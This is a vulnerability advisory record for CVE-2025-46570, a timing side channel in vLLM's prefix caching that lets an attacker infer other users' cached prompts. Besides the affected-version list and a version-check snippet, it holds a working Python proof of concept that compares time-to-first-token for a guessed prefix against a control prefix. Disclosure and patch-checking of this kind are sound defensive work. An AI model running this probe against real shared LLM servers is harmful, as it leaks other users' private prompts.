CVE-2025-46570

Source
https://nvd.nist.gov/vuln/detail/CVE-2025-46570
Import Source
https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2025-46570.json
JSON Data
https://api.osv.dev/v1/vulns/CVE-2025-46570
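The machine-readable record can also be fetched programmatically from the OSV API (GET /v1/vulns/{id}). A minimal sketch, assuming the Python requests library is installed:

    import requests

    # Fetch the OSV record for this CVE from the public API.
    resp = requests.get("https://api.osv.dev/v1/vulns/CVE-2025-46570", timeout=10)
    resp.raise_for_status()
    record = resp.json()
    print(record["id"], record.get("modified"))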
Published
2025-05-29T17:15:21Z
Modified
2025-05-30T21:02:17.817769Z
Summary
[none]
Details

vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed and the PagedAttention mechanism finds a matching prefix chunk, the prefill phase speeds up, which is reflected in the TTFT (Time to First Token). The timing differences caused by matching chunks are large enough to be measured and exploited, allowing an attacker to infer whether a given prefix is already cached, for example from another user's prompt. This issue has been patched in version 0.9.0.
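The leak is a timing side channel: a prefix-cache hit shortens prefill, so an attacker only has to compare TTFT for a guessed prefix against a control prefix that cannot already be cached. The sketch below is illustrative and not taken from the advisory; it assumes a vLLM OpenAI-compatible server on localhost:8000 started with prefix caching enabled, and the model name and prompt strings are placeholders.

    import time
    import requests

    # Placeholder endpoint/model for a local vLLM OpenAI-compatible server
    # launched with prefix caching enabled (e.g. --enable-prefix-caching).
    VLLM_URL = "http://localhost:8000/v1/completions"
    MODEL = "my-model"

    def time_to_first_token(prompt: str) -> float:
        """Seconds until the first streamed chunk arrives (approximates TTFT)."""
        start = time.monotonic()
        with requests.post(
            VLLM_URL,
            json={"model": MODEL, "prompt": prompt, "max_tokens": 1, "stream": True},
            stream=True,
            timeout=30,
        ) as resp:
            for line in resp.iter_lines():
                if line:  # first non-empty SSE line ~ first token
                    return time.monotonic() - start
        return float("inf")

    # A prefix the attacker guesses another user may have sent, versus a
    # control prefix that cannot already be cached. A consistently lower
    # TTFT for the guess suggests a prefix-cache hit.
    guessed = "You are a banking assistant for ExampleCorp. " + "Hello"
    control = "zq9x never-seen random prefix 4817263. " + "Hello"

    for label, prompt in [("guessed", guessed), ("control", control)]:
        samples = sorted(time_to_first_token(prompt) for _ in range(5))
        print(label, "median TTFT:", round(samples[2], 4), "s")

On an unpatched server, repeated samples for the guessed prefix would show a measurably lower median TTFT whenever that prefix is cached.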

Affected packages

Git / github.com/vllm-project/vllm

Affected ranges

Type
GIT
Repo
https://github.com/vllm-project/vllm
Events
Introduced
0 (unknown introduced commit; all previous commits are affected)
Fixed

Affected versions

Other

submission

v0.*

v0.1.0
v0.1.1
v0.1.2
v0.1.3
v0.1.4
v0.1.5
v0.1.6
v0.1.7
v0.2.0
v0.2.1
v0.2.2
v0.2.3
v0.2.4
v0.2.5
v0.2.6
v0.2.7
v0.3.0
v0.3.1
v0.3.2
v0.3.3
v0.4.0
v0.4.0.post1
v0.4.1
v0.4.2
v0.4.3
v0.5.0
v0.5.0.post1
v0.5.1
v0.5.2
v0.5.3
v0.5.3.post1
v0.5.4
v0.5.5
v0.6.0
v0.6.1
v0.6.1.post1
v0.6.1.post2
v0.6.2
v0.6.3
v0.6.3.post1
v0.6.4
v0.6.4.post1
v0.6.5
v0.6.6
v0.6.6.post1
v0.7.0
v0.7.1
v0.7.2
v0.7.3
v0.8.0rc1
v0.8.0rc2
v0.8.1
v0.8.2
v0.8.3rc1
v0.8.4
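Since every listed tag precedes the 0.9.0 fix, a deployment can check whether its installed vLLM is affected with a plain version comparison. A sketch, assuming the packaging library is available:

    from packaging.version import Version

    try:
        import vllm
        installed = Version(vllm.__version__)
        if installed < Version("0.9.0"):
            print(f"vLLM {installed} is affected by CVE-2025-46570; upgrade to >= 0.9.0")
        else:
            print(f"vLLM {installed} includes the fix")
    except ImportError:
        print("vllm is not installed")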